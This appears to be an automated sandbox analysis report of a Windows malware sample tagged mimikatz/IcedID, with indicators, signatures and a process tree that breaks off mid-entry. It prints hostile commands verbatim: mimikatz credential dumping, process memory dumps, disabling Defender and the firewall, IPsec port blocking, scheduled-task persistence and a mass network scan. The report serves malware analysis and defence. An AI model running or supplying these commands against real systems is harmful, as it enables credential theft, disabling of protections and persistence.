Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-04-2024 23:21
Behavioral task: behavioral1
Sample: 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en
General
Target: 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
Size: 8.6MB
MD5: 1d19798d7ceeca210b1367ec7eb96ba2
SHA1: b09268d441d351fc04d5dac38d20f094dd537d3e
SHA256: 055f3b570987fda9ecf3c37e7e59e153474fdbf02c9318ef7b29628b42f209ea
SHA512: 09cefa98ca338a62f8841ba94edd734ed769bc32bf88764da7855a0aa54c01cd3e9ee5236bee97610c26187f18db21d0ca43e5e61d2ad309b386302557424995
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes (description, pid, process, target process):
  PID 3516 created 2128  3516  euikgtl.exe  spoolsv.exe
Contacts a large (30798) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp  INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 39 IoCs
Processes:
XMRig Miner payload 11 IoCs
Processes:
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes (resource, yara_rule):
  behavioral2/memory/4028-0-0x0000000000400000-0x0000000000A9B000-memory.dmp  mimikatz
  C:\Windows\itspapsg\euikgtl.exe  mimikatz
  behavioral2/memory/2748-7-0x0000000000400000-0x0000000000A9B000-memory.dmp  mimikatz
  behavioral2/memory/4512-136-0x00007FF6310E0000-0x00007FF6311CE000-memory.dmp  mimikatz
Drops file in Drivers directory 3 IoCs
Processes (description, ioc, process):
  File opened for modification  C:\Windows\system32\drivers\etc\hosts  euikgtl.exe
  File created  C:\Windows\system32\drivers\npf.sys  wpcap.exe
  File created  C:\Windows\system32\drivers\etc\hosts  euikgtl.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes (pid, process):
  3060  netsh.exe
  3720  netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
Processes (description, ioc, process): all 40 operations were performed by euikgtl.exe under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.
  Key created for each of the following 20 subkeys:
    sethc.exe, perfmon.exe, WmiPrvSE.exe, taskkill.exe, takeown.exe, icacls.exe, bitsadmin.exe, netsh.exe, wscript.exe, magnify.exe, at.exe, powershell.exe, Regsvr32.exe, certutil.exe, mshta.exe, regini.exe, WinSAT.exe, reg.exe, cscript.exe, rundll32.exe
  Set value (str) <subkey>\Debugger = "C:\\Windows\\system32\\svchost.exe" for each of the same 20 subkeys:
    taskkill.exe, icacls.exe, perfmon.exe, Regsvr32.exe, takeown.exe, reg.exe, sethc.exe, certutil.exe, at.exe, powershell.exe, WinSAT.exe, wscript.exe, regini.exe, magnify.exe, bitsadmin.exe, WmiPrvSE.exe, netsh.exe, rundll32.exe, cscript.exe, mshta.exe
Executes dropped EXE 28 IoCs
Processes (pid, process):
  2748 euikgtl.exe, 3516 euikgtl.exe, 1448 wpcap.exe, 2512 bqalurljg.exe, 4512 vfshost.exe, 4344 jgqtbilab.exe, 4256 xohudmc.exe, 1360 nslfoo.exe, 4752 cktkgb.exe,
  872 jgqtbilab.exe, 1704 jgqtbilab.exe, 2548 jgqtbilab.exe, 2768 jgqtbilab.exe, 3748 jgqtbilab.exe, 2900 jgqtbilab.exe, 3104 jgqtbilab.exe, 4044 jgqtbilab.exe, 4728 jgqtbilab.exe, 3008 jgqtbilab.exe,
  3588 euikgtl.exe, 1228 jgqtbilab.exe, 4972 jgqtbilab.exe, 4692 jgqtbilab.exe, 4584 jgqtbilab.exe, 2904 jgqtbilab.exe, 2100 jgqtbilab.exe, 3556 nstjgbafp.exe, 6000 euikgtl.exe
Loads dropped DLL 12 IoCs
Processes (pid, process):
  1448  wpcap.exe  (9 occurrences)
  2512  bqalurljg.exe  (3 occurrences)
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
  63  ifconfig.me
  65  ifconfig.me
Creates a Windows Service
Drops file in System32 directory 18 IoCs
Processes (description, ioc, process):
  File created  C:\Windows\SysWOW64\pthreadVC.dll  wpcap.exe
  File created  C:\Windows\SysWOW64\Packet.dll  wpcap.exe
  File created  C:\Windows\system32\Packet.dll  wpcap.exe
  File created  C:\Windows\system32\wpcap.dll  wpcap.exe
  File created  C:\Windows\SysWOW64\wpcap.dll  wpcap.exe
  File created  C:\Windows\SysWOW64\nslfoo.exe  xohudmc.exe
  File opened for modification  C:\Windows\SysWOW64\nslfoo.exe  xohudmc.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A  euikgtl.exe
  File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751  euikgtl.exe
Drops file in Program Files directory 3 IoCs
Processes (description, ioc, process):
  File created  C:\Program Files\WinPcap\rpcapd.exe  wpcap.exe
  File created  C:\Program Files\WinPcap\LICENSE  wpcap.exe
  File created  C:\Program Files\WinPcap\uninstall.exe  wpcap.exe
Drops file in Windows directory 60 IoCs
Processes (description, ioc, process), grouped by process and directory:
  euikgtl.exe, File created:
    C:\Windows\ime\euikgtl.exe
    C:\Windows\itspapsg\: docmicfg.xml, schoedcl.xml, svschost.xml, spoolsrv.xml, vimpcsvc.xml
    C:\Windows\lubbeisit\abkgigiey\: Packet.dll, scan.bat, nstjgbafp.exe, ip.txt, wpcap.exe, wpcap.dll, bqalurljg.exe
    C:\Windows\lubbeisit\upbdrjv\swrpwe.exe
    C:\Windows\lubbeisit\Corporate\: mimidrv.sys, mimilib.dll, vfshost.exe
    C:\Windows\lubbeisit\UnattendGC\: AppCapture64.dll, AppCapture32.dll, svschost.xml, vimpcsvc.xml, schoedcl.xml, spoolsrv.xml, docmicfg.xml, Shellcode.ini
    C:\Windows\lubbeisit\UnattendGC\specials\: trfo-2.dll, coli-0.dll, exma-1.dll, libxml2.dll, posh-0.dll, docmicfg.exe, docmicfg.xml, cnli-1.dll, spoolsrv.xml, trch-1.dll, svschost.exe, vimpcsvc.exe, crli-0.dll, tibe-2.dll, schoedcl.xml, vimpcsvc.xml, schoedcl.exe, libeay32.dll, ssleay32.dll, zlib1.dll, xdvl-0.dll, svschost.xml, tucl-1.dll, ucl.dll, spoolsrv.exe
  euikgtl.exe, File opened for modification:
    C:\Windows\lubbeisit\abkgigiey\Packet.dll
    C:\Windows\itspapsg\: spoolsrv.xml, vimpcsvc.xml, svschost.xml, docmicfg.xml, schoedcl.xml
  2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe:
    File created  C:\Windows\itspapsg\euikgtl.exe
    File opened for modification  C:\Windows\itspapsg\euikgtl.exe
  nstjgbafp.exe:
    File opened for modification  C:\Windows\lubbeisit\abkgigiey\Result.txt
  cmd.exe:
    File opened for modification  C:\Windows\lubbeisit\Corporate\log.txt
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
  2100  sc.exe
  4604  sc.exe
  3876  sc.exe
  2576  sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
NSIS installer 3 IoCs
Processes (resource, yara_rule):
  C:\Windows\itspapsg\euikgtl.exe  nsis_installer_2
  C:\Windows\lubbeisit\abkgigiey\wpcap.exe  nsis_installer_1
  C:\Windows\lubbeisit\abkgigiey\wpcap.exe  nsis_installer_2
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process):
  1392  schtasks.exe
  2856  schtasks.exe
  4492  schtasks.exe
Modifies data under HKEY_USERS 43 IoCs
Processes (description, ioc, process), grouped by process:
  jgqtbilab.exe (one ProcDump instance per PID):
    Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump  (17 occurrences)
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"  (17 occurrences)
    Key created  \REGISTRY\USER\.DEFAULT\Software
    Key created  \REGISTRY\USER\.DEFAULT\Software\Sysinternals
    Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  euikgtl.exe:
    Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
    Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
Modifies registry class 14 IoCs
Processes (description, ioc, process): all 14 operations were performed by euikgtl.exe under \REGISTRY\MACHINE\SOFTWARE\Classes\.
  Key created for: .js\, .vbs\, .cmd\, .vbe\, .reg\, .ps1\, .bat\
  Set value (str) <extension>\ = "txtfile" for: .ps1\, .VBE\, .reg\, .cmd\, .js\, .bat\, .vbs\
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process):
  3516  euikgtl.exe  (64 occurrences)
Suspicious behavior: LoadsDriver 15 IoCs
Processes (pid, process):
  664  (no process name recorded)  (15 occurrences)
Suspicious behavior: RenamesItself 1 IoCs
Processes (pid, process):
  4028  2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4028 | 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 2748 | euikgtl.exe
Token: SeDebugPrivilege | 3516 | euikgtl.exe
Token: SeDebugPrivilege | 4512 | vfshost.exe
Token: SeDebugPrivilege | 4344 | jgqtbilab.exe
Token: SeLockMemoryPrivilege | 4752 | cktkgb.exe
Token: SeLockMemoryPrivilege | 4752 | cktkgb.exe
Token: SeDebugPrivilege | 872 | jgqtbilab.exe
Token: SeDebugPrivilege | 1704 | jgqtbilab.exe
Token: SeDebugPrivilege | 2548 | jgqtbilab.exe
Token: SeDebugPrivilege | 2768 | jgqtbilab.exe
Token: SeDebugPrivilege | 3748 | jgqtbilab.exe
Token: SeDebugPrivilege | 2900 | jgqtbilab.exe
Token: SeDebugPrivilege | 3104 | jgqtbilab.exe
Token: SeDebugPrivilege | 4044 | jgqtbilab.exe
Token: SeDebugPrivilege | 4728 | jgqtbilab.exe
Token: SeDebugPrivilege | 3008 | jgqtbilab.exe
Token: SeDebugPrivilege | 1228 | jgqtbilab.exe
Token: SeDebugPrivilege | 4972 | jgqtbilab.exe
Token: SeDebugPrivilege | 4692 | jgqtbilab.exe
Token: SeDebugPrivilege | 4584 | jgqtbilab.exe
Token: SeDebugPrivilege | 2904 | jgqtbilab.exe
Token: SeDebugPrivilege | 2100 | jgqtbilab.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid | process
4028 | 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
4028 | 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe
2748 | euikgtl.exe
2748 | euikgtl.exe
3516 | euikgtl.exe
3516 | euikgtl.exe
4256 | xohudmc.exe
1360 | nslfoo.exe
3588 | euikgtl.exe
3588 | euikgtl.exe
6000 | euikgtl.exe
6000 | euikgtl.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (each write is logged three times in the raw report; duplicate rows collapsed)
PID 4028 wrote to memory of 3008 | 4028 | 2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe | cmd.exe
PID 3008 wrote to memory of 4196 | 3008 | cmd.exe | PING.EXE
PID 3008 wrote to memory of 2748 | 3008 | cmd.exe | euikgtl.exe
PID 3516 wrote to memory of 1060 | 3516 | euikgtl.exe | cmd.exe
PID 1060 wrote to memory of 4276 | 1060 | cmd.exe | cmd.exe
PID 1060 wrote to memory of 2500 | 1060 | cmd.exe | cacls.exe
PID 1060 wrote to memory of 3536 | 1060 | cmd.exe | cmd.exe
PID 1060 wrote to memory of 3040 | 1060 | cmd.exe | cacls.exe
PID 1060 wrote to memory of 2836 | 1060 | cmd.exe | cmd.exe
PID 1060 wrote to memory of 2696 | 1060 | cmd.exe | cacls.exe
PID 3516 wrote to memory of 3632 | 3516 | euikgtl.exe | netsh.exe
PID 3516 wrote to memory of 3496 | 3516 | euikgtl.exe | netsh.exe
PID 3516 wrote to memory of 988 | 3516 | euikgtl.exe | netsh.exe
PID 3516 wrote to memory of 4980 | 3516 | euikgtl.exe | cmd.exe
PID 4980 wrote to memory of 1448 | 4980 | cmd.exe | wpcap.exe
PID 1448 wrote to memory of 4512 | 1448 | wpcap.exe | net.exe
PID 4512 wrote to memory of 4348 | 4512 | net.exe | net1.exe
PID 1448 wrote to memory of 3644 | 1448 | wpcap.exe | net.exe
PID 3644 wrote to memory of 4028 | 3644 | net.exe | net1.exe
PID 1448 wrote to memory of 3592 | 1448 | wpcap.exe | net.exe
PID 3592 wrote to memory of 4728 | 3592 | net.exe | net1.exe
PID 1448 wrote to memory of 2724 | 1448 | wpcap.exe | net.exe
Processes
-
C:\Windows\System32\spoolsv.exe  PID:2128
  cmd: C:\Windows\System32\spoolsv.exe
  C:\Windows\TEMP\tskqpisje\cktkgb.exe  PID:4752
    cmd: "C:\Windows\TEMP\tskqpisje\cktkgb.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe  PID:4028
  cmd: "C:\Users\Admin\AppData\Local\Temp\2024-04-09_1d19798d7ceeca210b1367ec7eb96ba2_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe  PID:3008
    cmd: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\itspapsg\euikgtl.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\PING.EXE  PID:4196
      cmd: ping 127.0.0.1 -n 5
      - Runs ping.exe
    C:\Windows\itspapsg\euikgtl.exe  PID:2748
      cmd: C:\Windows\itspapsg\euikgtl.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

C:\Windows\itspapsg\euikgtl.exe  PID:3516
  cmd: C:\Windows\itspapsg\euikgtl.exe
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe  PID:1060
    cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  PID:4276
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:2500
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe  PID:3536
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:3040
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe  PID:2836
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe  PID:2696
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  C:\Windows\SysWOW64\netsh.exe  PID:3632
    cmd: netsh ipsec static del all
  C:\Windows\SysWOW64\netsh.exe  PID:3496
    cmd: netsh ipsec static add policy name=Bastards description=FuckingBastards
  C:\Windows\SysWOW64\netsh.exe  PID:988
    cmd: netsh ipsec static add filteraction name=BastardsList action=block
  C:\Windows\SysWOW64\cmd.exe  PID:4980
    cmd: cmd /c C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S
    - Suspicious use of WriteProcessMemory
    C:\Windows\lubbeisit\abkgigiey\wpcap.exe  PID:1448
      cmd: C:\Windows\lubbeisit\abkgigiey\wpcap.exe /S
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net.exe  PID:4512
        cmd: net stop "Boundary Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe  PID:4348
          cmd: C:\Windows\system32\net1 stop "Boundary Meter"
      C:\Windows\SysWOW64\net.exe  PID:3644
        cmd: net stop "TrueSight Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe  PID:4028
          cmd: C:\Windows\system32\net1 stop "TrueSight Meter"
      C:\Windows\SysWOW64\net.exe  PID:3592
        cmd: net stop npf
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe  PID:4728
          cmd: C:\Windows\system32\net1 stop npf
      C:\Windows\SysWOW64\net.exe  PID:2724
        cmd: net start npf
        C:\Windows\SysWOW64\net1.exe  PID:1108
          cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe  PID:4408
    cmd: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe  PID:5008
      cmd: net start npf
      C:\Windows\SysWOW64\net1.exe  PID:4228
        cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe  PID:3996
    cmd: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe  PID:3964
      cmd: net start npf
      C:\Windows\SysWOW64\net1.exe  PID:2696
        cmd: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe  PID:1040
    cmd: cmd /c C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt
    C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe  PID:2512
      cmd: C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lubbeisit\abkgigiey\Scant.txt
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Windows\SysWOW64\cmd.exe  PID:2952
    cmd: cmd /c C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lubbeisit\Corporate\log.txt
    - Drops file in Windows directory
    C:\Windows\lubbeisit\Corporate\vfshost.exe  PID:4512
      cmd: C:\Windows\lubbeisit\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe  PID:2556
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"
    C:\Windows\SysWOW64\cmd.exe  PID:796
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe  PID:2856
      cmd: schtasks /create /sc minute /mo 1 /tn "ltspunbjs" /ru system /tr "cmd /c C:\Windows\ime\euikgtl.exe"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe  PID:3692
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe  PID:2904
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe  PID:1392
      cmd: schtasks /create /sc minute /mo 1 /tn "apybablby" /ru system /tr "cmd /c echo Y|cacls C:\Windows\itspapsg\euikgtl.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe  PID:4040
    cmd: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe  PID:4616
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe  PID:4492
      cmd: schtasks /create /sc minute /mo 1 /tn "igbsawatu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tskqpisje\cktkgb.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\netsh.exe  PID:3544
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe  PID:5076
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe  PID:3592
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe  PID:4456
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe  PID:4392
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe  PID:4980
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe  PID:660
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe  PID:4440
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe  PID:2216
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe  PID:3508
    cmd: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe  PID:876
    cmd: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe  PID:4704
    cmd: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\cmd.exe  PID:4892
    cmd: cmd /c net stop SharedAccess
    C:\Windows\SysWOW64\net.exe  PID:4540
      cmd: net stop SharedAccess
      C:\Windows\SysWOW64\net1.exe  PID:3112
        cmd: C:\Windows\system32\net1 stop SharedAccess
  C:\Windows\SysWOW64\cmd.exe  PID:4480
    cmd: cmd /c netsh firewall set opmode mode=disable
    C:\Windows\SysWOW64\netsh.exe  PID:3060
      cmd: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  C:\Windows\SysWOW64\cmd.exe  PID:412
    cmd: cmd /c netsh Advfirewall set allprofiles state off
    C:\Windows\SysWOW64\netsh.exe  PID:3720
      cmd: netsh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:4344
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 772 C:\Windows\TEMP\lubbeisit\772.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe  PID:3644
    cmd: cmd /c net stop MpsSvc
    C:\Windows\SysWOW64\net.exe  PID:5100
      cmd: net stop MpsSvc
      C:\Windows\SysWOW64\net1.exe  PID:1108
        cmd: C:\Windows\system32\net1 stop MpsSvc
  C:\Windows\SysWOW64\cmd.exe  PID:1392
    cmd: cmd /c net stop WinDefend
    C:\Windows\SysWOW64\net.exe  PID:4872
      cmd: net stop WinDefend
      C:\Windows\SysWOW64\net1.exe  PID:1352
        cmd: C:\Windows\system32\net1 stop WinDefend
  C:\Windows\SysWOW64\cmd.exe  PID:4568
    cmd: cmd /c net stop wuauserv
    C:\Windows\SysWOW64\net.exe  PID:5032
      cmd: net stop wuauserv
      C:\Windows\SysWOW64\net1.exe  PID:4716
        cmd: C:\Windows\system32\net1 stop wuauserv
  C:\Windows\SysWOW64\cmd.exe  PID:3752
    cmd: cmd /c sc config MpsSvc start= disabled
    C:\Windows\SysWOW64\sc.exe  PID:2100
      cmd: sc config MpsSvc start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe  PID:4888
    cmd: cmd /c sc config SharedAccess start= disabled
    C:\Windows\SysWOW64\sc.exe  PID:4604
      cmd: sc config SharedAccess start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe  PID:2968
    cmd: cmd /c sc config WinDefend start= disabled
    C:\Windows\SysWOW64\sc.exe  PID:3876
      cmd: sc config WinDefend start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe  PID:3940
    cmd: cmd /c sc config wuauserv start= disabled
    C:\Windows\SysWOW64\sc.exe  PID:2576
      cmd: sc config wuauserv start= disabled
      - Launches sc.exe
  C:\Windows\TEMP\xohudmc.exe  PID:4256
    cmd: C:\Windows\TEMP\xohudmc.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:872
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 60 C:\Windows\TEMP\lubbeisit\60.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:1704
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2128 C:\Windows\TEMP\lubbeisit\2128.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:2548
    cmd: C:\Windows\TEMP\lubbeisit\jgqtbilab.exe -accepteula -mp 2580 C:\Windows\TEMP\lubbeisit\2580.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\TEMP\lubbeisit\jgqtbilab.exe  PID:2768
